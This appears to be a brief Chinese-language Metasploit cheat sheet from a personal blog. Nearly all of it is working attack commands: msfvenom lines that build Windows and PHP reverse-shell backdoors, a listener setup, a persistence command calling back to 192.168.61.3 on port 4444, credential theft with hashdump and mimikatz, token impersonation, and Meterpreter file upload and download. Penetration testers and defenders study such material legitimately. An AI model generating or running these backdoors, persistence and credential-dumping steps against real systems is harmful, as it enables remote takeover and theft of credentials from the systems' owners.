Metasploit笔记
生成exe后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe
生成PHP后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php
使用监听模块(默认)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
搜寻存在漏洞模块
post/multi/recon/local_exploit_suggester
迁移进程
migrate pid
权限维持 -Persistence
run persistence -U -i 10 -p 4444 -r 192.168.61.3
抓取Hash
run hashdump
load mimikatz
令牌伪装
list_tokens-u
如果查看失败先用
use incognito 或者 load incognito
进入该模块 再使用
impersonate_token 用户名
基本操作命令
ls:列出当前路径下的所有文件和文件夹。
pwd 或 getwd:查看当前路径。
search:搜索文件,使用 search -h 查看帮助。
cat:查看文件内容,比如 cat test.txt。
edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。
rm:删除文件。
cd:切换路径。
mkdir:创建文件夹。
rmdir:删除文件夹。
getlwd 或 lpwd:查看自己系统的当前路径。
lcd:切换自己当前系统的目录。
lls:显示自己当前系统的所有文件和文件夹。
upload: upload 本地文件路径目标文件路径.
download: download 目标文件路径 本地文件路径

浙公网安备 33010602011771号